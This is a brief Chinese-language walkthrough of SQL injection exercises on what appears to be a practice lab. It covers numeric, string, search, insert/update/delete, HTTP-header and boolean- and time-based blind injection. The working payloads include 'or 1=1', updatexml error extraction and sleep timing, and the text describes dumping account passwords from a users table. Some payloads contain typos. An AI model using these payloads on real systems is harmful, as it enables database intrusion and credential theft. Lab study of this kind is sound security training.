一、数字型注入

1.先输入一下看看

 2.直接抓包，在编号后面加真命题

 成功注入爆数据库

二、字符型注入

1.加单引号报错，说明存在注入

 2.加上真命题爆出all

 三、搜索型注入

1.加单引号报错，直接加真命题

lucy' or 1=1 #

 四、xx型注入

1.先试了试a'，发现没有反应，后来在提示里看见了一个反括号，于是加了一个反括号

发现有回显

于是利用联合查询，order为2

2.爆出数据库名字

3.通过数据库名爆出users，从users中爆出账户和密码

五、insert\update注入

1.1.insert注入
测试模块：注册处
令用户名为a’

Payload:

a' or updatexml(1,concat(0x7e,database()),0) or'

爆出数据库名

2.update注入

先登录进去，然后在修改资料处填写信息抓包
Payload:

a' or updatexml(1,concat(0x7e,database()),0) or'

 成功

六、delete注入

1.先留言，点击删除时抓包

2.修改payload

 成功

七、http header注入

1.抓包，对UA头修改

 将payload构造

1' or updatexml (1,concat(0x7e,datebase()),0) or '

 八、盲注(base on boolian)

1.只有输入kobe' and 1=1 # 才有反应

 2.利用and构造

kobe' and ascii(substr(database(),1,1))=112#

 九、盲注(base on time)

1.kobe' and if ((substr(database(),1,1))='a',sleep=(5),null)#

急速返回，说明首字母不是a

根据时间的延迟来做判断
用 if 做判断，通过 database 把数据库名称取出来，通过 substr 把数据库第一个字符取出来，和 p 作比较，如果等于p 则暂停5秒钟。